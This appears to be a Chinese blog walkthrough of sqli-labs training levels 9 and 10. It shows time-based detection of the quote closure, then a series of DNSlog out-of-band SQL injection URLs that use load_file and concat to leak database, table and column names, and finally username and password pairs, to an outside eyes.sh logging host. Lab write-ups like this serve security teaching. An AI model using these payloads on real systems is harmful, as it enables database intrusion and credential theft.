sqli-labs靶场less-9和less-10

sqli-labs靶场less-9

本文只展示如何利用dnslog注入通过本关,注入原理可以参考我另外一篇文章

DSNlog注入原理

1、确定闭合方式

http://192.168.140.130/sq/Less-9/?id=1

发现id的值不论为任何值,页面回显都是一致的You are in...

判断不存在布尔注入,报错注入

用dnslog注入,构造1' and sleep(2) --+确定闭合方式

可以将单引号修改为",'),')),"),"))等,查看页面回显时间,最终确定语句为

http://192.168.140.130/sq/Less-9/?id=1' and sleep(2) --+

页面回显延迟,确定闭合方式为' '

2、平台选取

打开网址 https://eyes.sh/login ,注册账号

也可以使用其他平台,更多平台可以参考我上面提到的连接

登入进去

3、dnslog注入

构造语句

http://192.168.140.130/sq/Less-9/?id=1' and (select load_file(concat('//',(select database()),'.zifei.eyes.sh/test.txt'))) --+

concat是为了将里面的值拼接起来

zifeiyu.eyes.sh是自己在eses.sh中注册

查看网页得到数据库名

数据库版本

爆出所有数据库

http://192.168.140.130/sq/Less-9/?id=1' and (select load_file(concat('//',(select schema_name from information_schema.schemata limit 0,1),'.zifei.eyes.sh/test.txt'))) --+

http://192.168.140.130/sq/Less-9/?id=1' and (select load_file(concat('//',(select schema_name from information_schema.schemata limit 1,1),'.zifei.eyes.sh/test.txt'))) --+

http://192.168.140.130/sq/Less-9/?id=1' and (select load_file(concat('//',(select schema_name from information_schema.schemata limit 2,1),'.zifei.eyes.sh/test.txt'))) --+

http://192.168.140.130/sq/Less-9/?id=1' and (select load_file(concat('//',(select schema_name from information_schema.schemata limit 3,1),'.zifei.eyes.sh/test.txt'))) --+

此处图片只列举一些

爆出security的所有表

  • http://192.168.140.130/sq/Less-9/?id=1' and (select load_file(concat('//',(select table_name from information_schema.tables where table_schema=database() limit 1,1),'.zifei.eyes.sh/test.txt'))) --+
  • http://192.168.140.130/sq/Less-9/?id=1' and (select load_file(concat('//',(select table_name from information_schema.tables where table_schema=database() limit 2,1),'.zifei.eyes.sh/test.txt'))) --+
  • http://192.168.140.130/sq/Less-9/?id=1' and (select load_file(concat('//',(select table_name from information_schema.tables where table_schema=database() limit 3,1),'.zifei.eyes.sh/test.txt'))) --+

爆出列名

  • http://192.168.140.130/sq/Less-9/?id=1' and (select load_file(concat('//',(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),'.zifei.eyes.sh/test.txt'))) --+
  • http://192.168.140.130/sq/Less-9/?id=1' and (select load_file(concat('//',(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 1,1),'.zifei.eyes.sh/test.txt'))) --+
  • http://192.168.140.130/sq/Less-9/?id=1' and (select load_file(concat('//',(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 1,1),'.zifei.eyes.sh/test.txt'))) --+

爆出数据

http://192.168.140.130/sq/Less-9/?id=1' and (select load_file(concat('//',(select concat(username,'.',password) from security.users limit 0,1),'.zifei.eyes.sh/test.txt'))) --+

只需要修改0的值,便可以得到所有的值

less-10

本关与第九关用dnslog通过方式一样,只不过闭合方式为";其他一致

相关推荐
m0_748254881 分钟前
DataX3.0+DataX-Web部署分布式可视化ETL系统
前端·分布式·etl
星竹4 分钟前
upload-labs-master第21关超详细教程
网络安全
蜜獾云6 分钟前
docker 安装雷池WAF防火墙 守护Web服务器
linux·运维·服务器·网络·网络安全·docker·容器
ZJ_.13 分钟前
WPSJS:让 WPS 办公与 JavaScript 完美联动
开发语言·前端·javascript·vscode·ecmascript·wps
GIS开发特训营17 分钟前
Vue零基础教程|从前端框架到GIS开发系列课程(七)响应式系统介绍
前端·vue.js·前端框架·gis开发·webgis·三维gis
Mr.1336 分钟前
数据库的三范式是什么?
数据库
Cachel wood43 分钟前
python round四舍五入和decimal库精确四舍五入
java·linux·前端·数据库·vue.js·python·前端框架
学代码的小前端44 分钟前
0基础学前端-----CSS DAY9
前端·css
joan_851 小时前
layui表格templet图片渲染--模板字符串和字符串拼接
前端·javascript·layui
Python之栈1 小时前
【无标题】
数据库·python·mysql